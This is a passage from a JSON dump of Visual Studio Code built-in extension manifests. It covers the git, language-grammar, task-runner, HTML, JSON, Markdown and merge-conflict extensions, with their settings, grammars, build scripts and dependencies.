off.","default":"all"},"git.checkoutType":{"type":"string","enum":["all","local","tags","remote"],"description":"Controls what type of branches are listed when running `Checkout to...`. `all` shows all refs, `local` shows only the local branchs, `tags` shows only tags and `remote` shows only remote branches.","default":"all"},"git.ignoreLegacyWarning":{"type":"boolean","description":"Ignores the legacy Git warning","default":false},"git.ignoreMissingGitWarning":{"type":"boolean","description":"Ignores the warning when Git is missing","default":false},"git.ignoreLimitWarning":{"type":"boolean","description":"Ignores the warning when there are too many changes in a repository","default":false},"git.defaultCloneDirectory":{"type":"string","default":null,"description":"The default location where to clone a git repository"},"git.enableSmartCommit":{"type":"boolean","description":"Commit all changes when there are no staged changes.","default":false},"git.enableCommitSigning":{"type":"boolean","description":"Enables commit signing with GPG.","default":false},"git.decorations.enabled":{"type":"boolean","default":true,"description":"Controls if Git contributes colors and badges to the explorer and the open editors view."}}},"colors":[{"id":"gitDecoration.modifiedResourceForeground","description":"Color for modified resources.","defaults":{"light":"#a76e12","dark":"#E2C08D","highContrast":"#E2C08D"}},{"id":"gitDecoration.deletedResourceForeground","description":"Color for deleted resources.","defaults":{"light":"#ad0707","dark":"#c74e39","highContrast":"#c74e39"}},{"id":"gitDecoration.untrackedResourceForeground","description":"Color for untracked resources.","defaults":{"light":"#019001","dark":"#73C991","highContrast":"#73C991"}},{"id":"gitDecoration.ignoredResourceForeground","description":"Color for ignored resources.","defaults":{"light":"#8E8E90","dark":"#A7A8A9","highContrast":"#A7A8A9"}},{"id":"gitDecoration.conflictingResourceForeground","description":"Color for resources with conflicts.","defaults":{"light":"#6c6cc4","dark":"#6c6cc4","highContrast":"#6c6cc4"}}]},"dependencies":{"byline":"^5.0.0","file-type":"^7.2.0","iconv-lite":"0.4.19","vscode-extension-telemetry":"0.0.8","vscode-nls":"2.0.2"},"devDependencies":{"@types/byline":"4.2.31","@types/file-type":"^5.2.1","@types/mocha":"2.2.43","@types/node":"7.0.43","mocha":"^3.2.0"},"isBuiltin":true,"id":"vscode.git","extensionFolderPath":"/usr/share/code/resources/app/extensions/git"},{"name":"gitsyntax","publisher":"vscode","displayName":"gitsyntax","description":"Git Syntax","version":"0.0.1","engines":{"vscode":"^1.5.0"},"categories":["Other"],"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/git.tmbundle Syntaxes/Git%20Commit%20Message.tmLanguage ./syntaxes/git-commit.tmLanguage.json Syntaxes/Git%20Rebase%20Message.tmLanguage ./syntaxes/git-rebase.tmLanguage.json"},"contributes":{"languages":[{"id":"git-commit","aliases":["Git Commit Message","git-commit"],"filenames":["COMMIT_EDITMSG","MERGE_MSG"],"configuration":"./git-commit.language-configuration.json"},{"id":"git-rebase","aliases":["Git Rebase Message","git-rebase"],"filenames":["git-rebase-todo"],"configuration":"./git-rebase.language-configuration.json"}],"grammars":[{"language":"git-commit","scopeName":"text.git-commit","path":"./syntaxes/git-commit.tmLanguage.json"},{"language":"git-rebase","scopeName":"text.git-rebase","path":"./syntaxes/git-rebase.tmLanguage.json"}],"configurationDefaults":{"[git-commit]":{"editor.rulers":[72]}}},"isBuiltin":true,"id":"vscode.gitsyntax","extensionFolderPath":"/usr/share/code/resources/app/extensions/gitsyntax"},{"name":"go","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js atom/language-go grammars/go.cson ./syntaxes/go.json"},"contributes":{"languages":[{"id":"go","extensions":[".go"],"aliases":["Go"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"go","scopeName":"source.go","path":"./syntaxes/go.json"}],"configurationDefaults":{"[go]":{"editor.insertSpaces":false}}},"isBuiltin":true,"id":"vscode.go","extensionFolderPath":"/usr/share/code/resources/app/extensions/go"},{"name":"groovy","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/groovy.tmbundle Syntaxes/Groovy.tmLanguage ./syntaxes/groovy.tmLanguage.json"},"contributes":{"languages":[{"id":"groovy","aliases":["Groovy","groovy"],"extensions":[".groovy",".gvy",".gradle"],"filenames":["Jenkinsfile"],"firstLine":"^#!.*\\bgroovy\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"groovy","scopeName":"source.groovy","path":"./syntaxes/groovy.tmLanguage.json"}],"snippets":[{"language":"groovy","path":"./snippets/groovy.json"}]},"isBuiltin":true,"id":"vscode.groovy","extensionFolderPath":"/usr/share/code/resources/app/extensions/groovy"},{"name":"grunt","publisher":"vscode","description":"Extension to add Grunt capabilities to VSCode.","displayName":"Grunt support for VSCode","version":"0.0.1","engines":{"vscode":"*"},"categories":["Other"],"scripts":{"compile":"gulp compile-extension:grunt","watch":"gulp watch-extension:grunt"},"dependencies":{"vscode-nls":"^2.0.2"},"devDependencies":{"@types/node":"7.0.43"},"main":"/usr/share/code/resources/app/extensions/grunt/out/main","activationEvents":["onCommand:workbench.action.tasks.runTask"],"contributes":{"configuration":{"id":"grunt","type":"object","title":"Grunt","properties":{"grunt.autoDetect":{"scope":"resource","type":"string","enum":["off","on"],"default":"on","description":"Controls whether auto detection of Grunt tasks is on or off. Default is on."}}},"taskDefinitions":[{"type":"grunt","required":["task"],"properties":{"task":{"type":"string","description":"The Grunt task to customize"},"file":{"type":"string","description":"The Grunt file that provides the task. Can be omitted."}}}]},"isBuiltin":true,"id":"vscode.grunt","extensionFolderPath":"/usr/share/code/resources/app/extensions/grunt"},{"name":"gulp","publisher":"vscode","description":"Extension to add Gulp capabilities to VSCode.","displayName":"Gulp support for VSCode","version":"0.0.1","engines":{"vscode":"*"},"categories":["Other"],"scripts":{"compile":"gulp compile-extension:gulp","watch":"gulp watch-extension:gulp"},"dependencies":{"vscode-nls":"^2.0.2"},"devDependencies":{"@types/node":"7.0.43"},"main":"/usr/share/code/resources/app/extensions/gulp/out/main","activationEvents":["onCommand:workbench.action.tasks.runTask"],"contributes":{"configuration":{"id":"gulp","type":"object","title":"Gulp","properties":{"gulp.autoDetect":{"scope":"resource","type":"string","enum":["off","on"],"default":"on","description":"Controls whether auto detection of Gulp tasks is on or off. Default is on."}}},"taskDefinitions":[{"type":"gulp","required":["task"],"properties":{"task":{"type":"string","description":"The Gulp task to customize"},"file":{"type":"string","description":"The Gulp file that provides the task. Can be omitted."}}}]},"isBuiltin":true,"id":"vscode.gulp","extensionFolderPath":"/usr/share/code/resources/app/extensions/gulp"},{"name":"handlebars","version":"0.1.0","publisher":"vscode","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js daaain/Handlebars grammars/Handlebars.json ./syntaxes/Handlebars.tmLanguage.json"},"contributes":{"languages":[{"id":"handlebars","extensions":[".handlebars",".hbs",".hjs"],"aliases":["Handlebars","handlebars"],"mimetypes":["text/x-handlebars-template"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"handlebars","scopeName":"text.html.handlebars","path":"./syntaxes/Handlebars.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.handlebars","extensionFolderPath":"/usr/share/code/resources/app/extensions/handlebars"},{"name":"hlsl","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js tgjones/shaders-tmLanguage grammars/hlsl.json ./syntaxes/hlsl.json"},"contributes":{"languages":[{"id":"hlsl","extensions":[".hlsl",".hlsli",".fx",".fxh",".vsh",".psh",".cginc",".compute"],"aliases":["HLSL","hlsl"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"hlsl","path":"./syntaxes/hlsl.json","scopeName":"source.hlsl"}]},"isBuiltin":true,"id":"vscode.hlsl","extensionFolderPath":"/usr/share/code/resources/app/extensions/hlsl"},{"name":"html","version":"0.1.0","publisher":"vscode","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","engines":{"vscode":"0.10.x"},"activationEvents":["onLanguage:html","onLanguage:handlebars","onLanguage:razor"],"enableProposedApi":true,"main":"/usr/share/code/resources/app/extensions/html/client/out/htmlMain","scripts":{"compile":"gulp compile-extension:html-client && gulp compile-extension:html-server","postinstall":"cd server && yarn install","update-grammar":"node ../../build/npm/update-grammar.js textmate/html.tmbundle Syntaxes/HTML.plist ./syntaxes/html.json","install-client-next":"yarn add vscode-languageclient@next"},"contributes":{"languages":[{"id":"html","extensions":[".html",".htm",".shtml",".xhtml",".mdoc",".jsp",".asp",".aspx",".jshtm",".volt",".ejs",".rhtml"],"aliases":["HTML","htm","html","xhtml"],"mimetypes":["text/html","text/x-jshtm","text/template","text/ng-template","application/xhtml+xml"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"html","scopeName":"text.html.basic","path":"./syntaxes/html.json","embeddedLanguages":{"text.html":"html","source.css":"css","source.js":"javascript","source.python":"python","source.smarty":"smarty"}}],"folding":{"markers":{"start":"^\\s*/","end":"^\\s*/"}},"snippets":[{"language":"html","path":"./snippets/html.snippets.json"}],"configuration":{"id":"html","order":20,"type":"object","title":"HTML","properties":{"html.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default HTML formatter"},"html.format.wrapLineLength":{"type":"integer","scope":"resource","default":120,"description":"Maximum amount of characters per line (0 = disable)."},"html.format.unformatted":{"type":["string","null"],"scope":"resource","default":"wbr","description":"List of tags, comma separated, that shouldn't be reformatted. 'null' defaults to all tags listed at https://www.w3.org/TR/html5/dom.html#phrasing-content."},"html.format.contentUnformatted":{"type":["string","null"],"scope":"resource","default":"pre,code,textarea","description":"List of tags, comma separated, where the content shouldn't be reformatted. 'null' defaults to the 'pre' tag."},"html.format.indentInnerHtml":{"type":"boolean","scope":"resource","default":false,"description":"Indent and sections."},"html.format.preserveNewLines":{"type":"boolean","scope":"resource","default":true,"description":"Whether existing line breaks before elements should be preserved. Only works before elements, not inside tags or for text."},"html.format.maxPreserveNewLines":{"type":["number","null"],"scope":"resource","default":null,"description":"Maximum number of line breaks to be preserved in one chunk. Use 'null' for unlimited."},"html.format.indentHandlebars":{"type":"boolean","scope":"resource","default":false,"description":"Format and indent {{#foo}} and {{/foo}}."},"html.format.endWithNewline":{"type":"boolean","scope":"resource","default":false,"description":"End with a newline."},"html.format.extraLiners":{"type":["string","null"],"scope":"resource","default":"head, body, /html","description":"List of tags, comma separated, that should have an extra newline before them. 'null' defaults to \"head, body, /html\"."},"html.format.wrapAttributes":{"type":"string","scope":"resource","default":"auto","enum":["auto","force","force-aligned","force-expand-multiline"],"enumDescriptions":["Wrap attributes only when line length is exceeded.","Wrap each attribute except first.","Wrap each attribute except first and keep aligned.","Wrap each attribute."],"description":"Wrap attributes."},"html.suggest.angular1":{"type":"boolean","scope":"resource","default":true,"description":"Configures if the built-in HTML language support suggests Angular V1 tags and properties."},"html.suggest.ionic":{"type":"boolean","scope":"resource","default":true,"description":"Configures if the built-in HTML language support suggests Ionic tags, properties and values."},"html.suggest.html5":{"type":"boolean","scope":"resource","default":true,"description":"Configures if the built-in HTML language support suggests HTML5 tags, properties and values."},"html.validate.scripts":{"type":"boolean","scope":"resource","default":true,"description":"Configures if the built-in HTML language support validates embedded scripts."},"html.validate.styles":{"type":"boolean","scope":"resource","default":true,"description":"Configures if the built-in HTML language support validates embedded styles."},"html.autoClosingTags":{"type":"boolean","scope":"resource","default":true,"description":"Enable/disable autoclosing of HTML tags."},"html.trace.server":{"type":"string","scope":"window","enum":["off","messages","verbose"],"default":"off","description":"Traces the communication between VS Code and the HTML language server."}}}},"dependencies":{"vscode-extension-telemetry":"0.0.8","vscode-languageclient":"^3.5.0","vscode-nls":"2.0.2"},"devDependencies":{"@types/node":"7.0.43"},"isBuiltin":true,"id":"vscode.html","extensionFolderPath":"/usr/share/code/resources/app/extensions/html"},{"name":"ini","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/ini.tmbundle Syntaxes/Ini.plist ./syntaxes/ini.tmLanguage.json"},"contributes":{"languages":[{"id":"ini","extensions":[".ini"],"aliases":["Ini","ini"],"configuration":"./ini.language-configuration.json"},{"id":"properties","extensions":[".properties",".gitconfig",".cfg",".conf"],"filenames":["config",".gitattributes",".gitconfig","gitconfig",".editorconfig"],"aliases":["Properties","properties"],"configuration":"./properties.language-configuration.json"}],"grammars":[{"language":"ini","scopeName":"source.ini","path":"./syntaxes/ini.tmLanguage.json"},{"language":"properties","scopeName":"source.ini","path":"./syntaxes/ini.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.ini","extensionFolderPath":"/usr/share/code/resources/app/extensions/ini"},{"name":"jake","publisher":"vscode","description":"Extension to add Jake capabilities to VSCode.","displayName":"Jake support for VSCode","version":"0.0.1","engines":{"vscode":"*"},"categories":["Other"],"scripts":{"compile":"gulp compile-extension:jake","watch":"gulp watch-extension:jake"},"dependencies":{"vscode-nls":"^2.0.2"},"devDependencies":{"@types/node":"7.0.43"},"main":"/usr/share/code/resources/app/extensions/jake/out/main","activationEvents":["onCommand:workbench.action.tasks.runTask"],"contributes":{"configuration":{"id":"jake","type":"object","title":"Jake","properties":{"jake.autoDetect":{"scope":"resource","type":"string","enum":["off","on"],"default":"on","description":"Controls whether auto detection of Jake tasks is on or off. Default is on."}}},"taskDefinitions":[{"type":"jake","required":["task"],"properties":{"task":{"type":"string","description":"The Jake task to customize"},"file":{"type":"string","description":"The Jake file that provides the task. Can be omitted."}}}]},"isBuiltin":true,"id":"vscode.jake","extensionFolderPath":"/usr/share/code/resources/app/extensions/jake"},{"name":"java","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js atom/language-java grammars/java.cson ./syntaxes/java.tmLanguage.json"},"contributes":{"languages":[{"id":"java","extensions":[".java",".jav"],"aliases":["Java","java"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"java","scopeName":"source.java","path":"./syntaxes/java.tmLanguage.json"}],"snippets":[{"language":"java","path":"./snippets/java.snippets.json"}]},"isBuiltin":true,"id":"vscode.java","extensionFolderPath":"/usr/share/code/resources/app/extensions/java"},{"name":"javascript","version":"0.1.0","publisher":"vscode","engines":{"vscode":"0.10.x"},"activationEvents":["onLanguage:javascript","onLanguage:json"],"main":"/usr/share/code/resources/app/extensions/javascript/out/javascriptMain","dependencies":{"jsonc-parser":"^0.3.1","request-light":"^0.2.0","vscode-nls":"^2.0.2"},"scripts":{"compile":"gulp compile-extension:javascript","watch":"gulp watch-extension:javascript"},"contributes":{"languages":[{"id":"javascriptreact","aliases":["JavaScript React","jsx"],"extensions":[".jsx"],"configuration":"./javascript-language-configuration.json"},{"id":"javascript","aliases":["JavaScript","javascript","js"],"extensions":[".js",".es6",".mjs",".pac"],"filenames":["jakefile"],"firstLine":"^#!.*\\bnode","mimetypes":["text/javascript"],"configuration":"./javascript-language-configuration.json"},{"id":"jsx-tags","aliases":[],"configuration":"./tags-language-configuration.json"}],"grammars":[{"language":"javascriptreact","scopeName":"source.js.jsx","path":"./syntaxes/JavaScriptReact.tmLanguage.json","embeddedLanguages":{"meta.tag.js":"jsx-tags","meta.tag.without-attributes.js":"jsx-tags","meta.tag.attributes.js.jsx":"javascriptreact","meta.embedded.expression.js":"javascriptreact"}},{"language":"javascript","scopeName":"source.js","path":"./syntaxes/JavaScript.tmLanguage.json","embeddedLanguages":{"meta.tag.js":"jsx-tags","meta.tag.without-attributes.js":"jsx-tags","meta.tag.attributes.js":"javascript","meta.embedded.expression.js":"javascript"}},{"scopeName":"source.js.regexp","path":"./syntaxes/Regular Expressions (JavaScript).tmLanguage"}],"snippets":[{"language":"javascript","path":"./snippets/javascript.json"},{"language":"javascriptreact","path":"./snippets/javascript.json"}],"jsonValidation":[{"fileMatch":"package.json","url":"http://json.schemastore.org/package"},{"fileMatch":"bower.json","url":"http://json.schemastore.org/bower"},{"fileMatch":".bowerrc","url":"http://json.schemastore.org/bowerrc"},{"fileMatch":".babelrc","url":"http://json.schemastore.org/babelrc"},{"fileMatch":".babelrc.json","url":"http://json.schemastore.org/babelrc"},{"fileMatch":"jsconfig.json","url":"http://json.schemastore.org/jsconfig"},{"fileMatch":"jsconfig.json","url":"./schemas/jsconfig.schema.json"},{"fileMatch":"jsconfig.*.json","url":"http://json.schemastore.org/jsconfig"},{"fileMatch":"jsconfig.*.json","url":"./schemas/jsconfig.schema.json"}]},"devDependencies":{"@types/node":"8.0.33"},"isBuiltin":true,"id":"vscode.javascript","extensionFolderPath":"/usr/share/code/resources/app/extensions/javascript"},{"name":"json","version":"0.1.0","publisher":"vscode","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","engines":{"vscode":"0.10.x"},"activationEvents":["onLanguage:json","onLanguage:jsonc"],"enableProposedApi":true,"main":"/usr/share/code/resources/app/extensions/json/client/out/jsonMain","scripts":{"compile":"gulp compile-extension:json-client && gulp compile-extension:json-server","postinstall":"cd server && yarn install","install-client-next":"yarn add vscode-languageclient@next","update-grammar":"node ../../build/npm/update-grammar.js Microsoft/vscode-JSON.tmLanguage JSON.tmLanguage ./syntaxes/JSON.tmLanguage.json"},"contributes":{"languages":[{"id":"json","aliases":["JSON","json"],"extensions":[".json",".bowerrc",".jshintrc",".jscsrc",".eslintrc",".babelrc",".webmanifest"],"filenames":[".watchmanconfig",".ember-cli"],"mimetypes":["application/json","application/manifest+json"],"configuration":"./language-configuration.json"},{"id":"jsonc","aliases":["JSON with Comments"],"extensions":[".code-workspace","language-configuration.json","icon-theme.json","color-theme.json"],"filenames":["settings.json","launch.json","tasks.json","keybindings.json","tsconfig.json","jsconfig.json"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"json","scopeName":"source.json","path":"./syntaxes/JSON.tmLanguage.json"},{"language":"jsonc","scopeName":"source.json","path":"./syntaxes/JSON.tmLanguage.json"}],"jsonValidation":[{"fileMatch":"*.schema.json","url":"http://json-schema.org/draft-04/schema#"}],"configuration":{"id":"json","order":20,"type":"object","title":"JSON","properties":{"json.schemas":{"type":"array","scope":"resource","description":"Associate schemas to JSON files in the current project","items":{"type":"object","default":{"fileMatch":["/myfile"],"url":"schemaURL"},"properties":{"url":{"type":"string","default":"/user.schema.json","description":"A URL to a schema or a relative path to a schema in the current directory"},"fileMatch":{"type":"array","items":{"type":"string","default":"MyFile.json","description":"A file pattern that can contain '*' to match against when resolving JSON files to schemas."},"minItems":1,"description":"An array of file patterns to match against when resolving JSON files to schemas."},"schema":{"$ref":"http://json-schema.org/draft-04/schema#","description":"The schema definition for the given URL. The schema only needs to be provided to avoid accesses to the schema URL."}}}},"json.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default JSON formatter (requires restart)"},"json.trace.server":{"type":"string","scope":"window","enum":["off","messages","verbose"],"default":"off","description":"Traces the communication between VS Code and the JSON language server."},"json.colorDecorators.enable":{"type":"boolean","scope":"window","default":true,"description":"Enables or disables color decorators","deprecationMessage":"The setting `json.colorDecorators.enable` has been deprecated in favor of `editor.colorDecorators`."}}},"configurationDefaults":{"[json]":{"editor.quickSuggestions":{"strings":true}}}},"dependencies":{"vscode-extension-telemetry":"0.0.8","vscode-languageclient":"^3.5.0","vscode-nls":"2.0.2"},"devDependencies":{"@types/node":"7.0.43"},"isBuiltin":true,"id":"vscode.json","extensionFolderPath":"/usr/share/code/resources/app/extensions/json"},{"name":"less","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js atom/language-less grammars/less.cson ./syntaxes/less.tmLanguage.json"},"contributes":{"languages":[{"id":"less","aliases":["Less","less"],"extensions":[".less"],"mimetypes":["text/x-less","text/less"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"less","scopeName":"source.css.less","path":"./syntaxes/less.tmLanguage.json"}],"problemMatchers":[{"name":"lessc","label":"Lessc compiler","owner":"lessc","fileLocation":"absolute","pattern":{"regexp":"(.*)\\sin\\s(.*)\\son line\\s(\\d+),\\scolumn\\s(\\d+)","message":1,"file":2,"line":3,"column":4}}]},"isBuiltin":true,"id":"vscode.less","extensionFolderPath":"/usr/share/code/resources/app/extensions/less"},{"name":"lua","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/lua.tmbundle Syntaxes/Lua.plist ./syntaxes/lua.json"},"contributes":{"languages":[{"id":"lua","extensions":[".lua"],"aliases":["Lua","lua"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"lua","scopeName":"source.lua","path":"./syntaxes/lua.json"}]},"isBuiltin":true,"id":"vscode.lua","extensionFolderPath":"/usr/share/code/resources/app/extensions/lua"},{"name":"make","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js fadeevab/make.tmbundle Syntaxes/Makefile.plist ./syntaxes/Makefile.json"},"contributes":{"languages":[{"id":"makefile","aliases":["Makefile","makefile"],"extensions":[".mk"],"filenames":["Makefile","makefile","GNUmakefile","OCamlMakefile"],"firstLine":"^#!/usr/bin/make","configuration":"./language-configuration.json"}],"grammars":[{"language":"makefile","scopeName":"source.makefile","path":"./syntaxes/Makefile.json"}],"configurationDefaults":{"[makefile]":{"editor.insertSpaces":false}}},"isBuiltin":true,"id":"vscode.make","extensionFolderPath":"/usr/share/code/resources/app/extensions/make"},{"name":"vscode-markdown","displayName":"VS Code Markdown","description":"Markdown for VS Code","version":"0.2.0","publisher":"Microsoft","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","engines":{"vscode":"^1.0.0"},"main":"/usr/share/code/resources/app/extensions/markdown/out/extension","categories":["Languages"],"activationEvents":["onLanguage:markdown","onCommand:markdown.refreshPreview","onCommand:markdown.showPreview","onCommand:markdown.showPreviewToSide","onCommand:markdown.showSource","onCommand:markdown.showPreviewSecuritySelector"],"contributes":{"languages":[{"id":"markdown","aliases":["Markdown","markdown"],"extensions":[".md",".mdown",".markdown",".markdn"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"markdown","scopeName":"text.html.markdown","path":"./syntaxes/markdown.tmLanguage","embeddedLanguages":{"meta.embedded.block.html":"html","source.js":"javascript","source.css":"css","meta.embedded.block.frontmatter":"yaml","meta.embedded.block.css":"css","meta.embedded.block.ini":"ini","meta.embedded.block.java":"java","meta.embedded.block.lua":"lua","meta.embedded.block.makefile":"makefile","meta.embedded.block.perl":"perl","meta.embedded.block.r":"r","meta.embedded.block.ruby":"ruby","meta.embedded.block.php":"php","meta.embedded.block.sql":"sql","meta.embedded.block.vs_net":"vs_net","meta.embedded.block.xml":"xml","meta.embedded.block.xsl":"xsl","meta.embedded.block.yaml":"yaml","meta.embedded.block.dosbatch":"dosbatch","meta.embedded.block.clojure":"clojure","meta.embedded.block.coffee":"coffee","meta.embedded.block.c":"c","meta.embedded.block.cpp":"cpp","meta.embedded.block.diff":"diff","meta.embedded.block.dockerfile":"dockerfile","meta.embedded.block.go":"go","meta.embedded.block.groovy":"groovy","meta.embedded.block.jade":"jade","meta.embedded.block.javascript":"javascript","meta.embedded.block.json":"json","meta.embedded.block.less":"less","meta.embedded.block.objc":"objc","meta.embedded.block.scss":"scss","meta.embedded.block.perl6":"perl6","meta.embedded.block.powershell":"powershell","meta.embedded.block.python":"python","meta.embedded.block.rust":"rust","meta.embedded.block.scala":"scala","meta.embedded.block.shellscript":"shellscript","meta.embedded.block.typescript":"typescript","meta.embedded.block.typescriptreact":"typescriptreact","meta.embedded.block.csharp":"csharp","meta.embedded.block.fsharp":"fsharp"}}],"commands":[{"command":"markdown.showPreview","title":"Open Preview","category":"Markdown","icon":{"light":"./media/Preview.svg","dark":"./media/Preview_inverse.svg"}},{"command":"markdown.showPreviewToSide","title":"Open Preview to the Side","category":"Markdown","icon":{"light":"./media/PreviewOnRightPane_16x.svg","dark":"./media/PreviewOnRightPane_16x_dark.svg"}},{"command":"markdown.showSource","title":"Show Source","category":"Markdown","icon":{"light":"./media/ViewSource.svg","dark":"./media/ViewSource_inverse.svg"}},{"command":"markdown.refreshPreview","title":"Refresh Preview","category":"Markdown"},{"command":"markdown.showPreviewSecuritySelector","title":"Change Preview Security Settings","category":"Markdown"}],"menus":{"editor/title":[{"command":"markdown.showPreviewToSide","when":"editorLangId == markdown","alt":"markdown.showPreview","group":"navigation"},{"command":"markdown.showSource","when":"resourceScheme == markdown","group":"navigation"},{"command":"markdown.refreshPreview","when":"resourceScheme == markdown"},{"command":"markdown.showPreviewSecuritySelector","when":"resourceScheme == markdown"}],"explorer/context":[{"command":"markdown.showPreview","when":"resourceLangId == markdown","group":"navigation"}],"commandPalette":[{"command":"markdown.showPreview","when":"editorLangId == markdown","group":"navigation"},{"command":"markdown.showPreviewToSide","when":"editorLangId == markdown","group":"navigation"},{"command":"markdown.showSource","when":"resourceScheme == markdown","group":"navigation"},{"command":"markdown.showPreviewSecuritySelector","when":"editorLangId == markdown"},{"command":"markdown.showPreviewSecuritySelector","when":"resourceScheme == markdown"}]},"keybindings":[{"command":"markdown.showPreview","key":"shift+ctrl+v","mac":"shift+cmd+v","when":"editorLangId == markdown"},{"command":"markdown.showPreviewToSide","key":"ctrl+k v","mac":"cmd+k v","when":"editorLangId == markdown"}],"snippets":[{"language":"markdown","path":"./snippets/markdown.json"}],"configuration":{"type":"object","title":"Markdown","order":20,"properties":{"markdown.styles":{"type":"array","default":[],"description":"A list of URLs or local paths to CSS style sheets to use from the markdown preview. Relative paths are interpreted relative to the folder open in the explorer. If there is no open folder, they are interpreted relative to the location of the markdown file. All '\\' need to be written as '\\\\'.","scope":"resource"},"markdown.previewFrontMatter":{"type":"string","enum":["hide","show"],"default":"hide","description":"Sets how YAML front matter should be rendered in the markdown preview. 'hide' removes the front matter. Otherwise, the front matter is treated as markdown content.","scope":"resource"},"markdown.preview.breaks":{"type":"boolean","default":false,"description":"Sets how line-breaks are rendered in the markdown preview. Setting it to 'true' creates a
for every newline.","scope":"resource"},"markdown.preview.linkify":{"type":"boolean","default":true,"description":"Enable or disable conversion of URL-like text to links in the markdown preview.","scope":"resource"},"markdown.preview.fontFamily":{"type":"string","default":"-apple-system, BlinkMacSystemFont, 'Segoe WPC', 'Segoe UI', 'HelveticaNeue-Light', 'Ubuntu', 'Droid Sans', sans-serif","description":"Controls the font family used in the markdown preview.","scope":"resource"},"markdown.preview.fontSize":{"type":"number","default":14,"description":"Controls the font size in pixels used in the markdown preview.","scope":"resource"},"markdown.preview.lineHeight":{"type":"number","default":1.6,"description":"Controls the line height used in the markdown preview. This number is relative to the font size.","scope":"resource"},"markdown.preview.scrollPreviewWithEditorSelection":{"type":"boolean","default":true,"description":"Scrolls the markdown preview to reveal the currently selected line from the editor.","scope":"resource"},"markdown.preview.markEditorSelection":{"type":"boolean","default":true,"description":"Mark the current editor selection in the markdown preview.","scope":"resource"},"markdown.preview.scrollEditorWithPreview":{"type":"boolean","default":true,"description":"When the markdown preview is scrolled, update the view of the editor.","scope":"resource"},"markdown.preview.doubleClickToSwitchToEditor":{"type":"boolean","default":true,"description":"Double click in the markdown preview to switch to the editor.","scope":"resource"},"markdown.trace":{"type":"string","enum":["off","verbose"],"default":"off","description":"Enable debug logging for the markdown extension.","scope":"window"}}},"configurationDefaults":{"[markdown]":{"editor.wordWrap":"on","editor.quickSuggestions":false}},"jsonValidation":[{"fileMatch":"package.json","url":"./schemas/package.schema.json"}]},"scripts":{"vscode:prepublish":"node ../../node_modules/gulp/bin/gulp.js --gulpfile ../../build/gulpfile.extensions.js compile-extension:markdown ./tsconfig.json","update-grammar":"node ../../node_modules/gulp/bin/gulp.js --gulpfile ./syntaxes/gulpfile.js"},"dependencies":{"highlight.js":"9.5.0","markdown-it":"^8.4.0","markdown-it-named-headers":"0.0.4","vscode-extension-telemetry":"0.0.8","vscode-nls":"2.0.2"},"devDependencies":{"@types/highlight.js":"9.1.10","@types/markdown-it":"0.0.2","@types/node":"7.0.43","gulp-rename":"^1.2.2","gulp-replace":"^0.5.4"},"isBuiltin":true,"id":"Microsoft.vscode-markdown","extensionFolderPath":"/usr/share/code/resources/app/extensions/markdown"},{"name":"merge-conflict","publisher":"vscode","displayName":"merge-conflict","description":"Merge Conflict","version":"0.7.0","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","engines":{"vscode":"^1.5.0"},"categories":["Other"],"activationEvents":["*"],"main":"/usr/share/code/resources/app/extensions/merge-conflict/out/extension","scripts":{"compile":"gulp compile-extension:merge-conflict","watch":"gulp watch-extension:merge-conflict"},"contributes":{"commands":[{"category":"Merge Conflict","title":"Accept All Current","command":"merge-conflict.accept.all-current"},{"category":"Merge Conflict","title":"Accept All Incoming","command":"merge-conflict.accept.all-incoming"},{"category":"Merge Conflict","title":"Accept All Both","command":"merge-conflict.accept.all-both"},{"category":"Merge Conflict","title":"Accept Current","command":"merge-conflict.accept.current"},{"category":"Merge Conflict","title":"Accept Incoming","command":"merge-conflict.accept.incoming"},{"category":"Merge Conflict","title":"Accept Selection","command":"merge-conflict.accept.selection"},{"category":"Merge Conflict","title":"Accept Both","command":"merge-conflict.accept.both"},{"category":"Merge Conflict","title":"Next Conflict","command":"merge-conflict.next"},{"category":"Merge Conflict","title":"Previous Conflict","command":"merge-conflict.previous"},{"category":"Merge Conflict","title":"Compare Current Conflict","command":"merge-conflict.compare"}],"configuration":{"title":"Merge Conflict","properties":{"merge-conflict.codeLens.enabled":{"type":"boolean","description":"Enable/disable merge conflict block CodeLens within editor","default":true},"merge-conflict.decorators.enabled":{"type":"boolean","description":"Enable/disable merge conflict decorators within 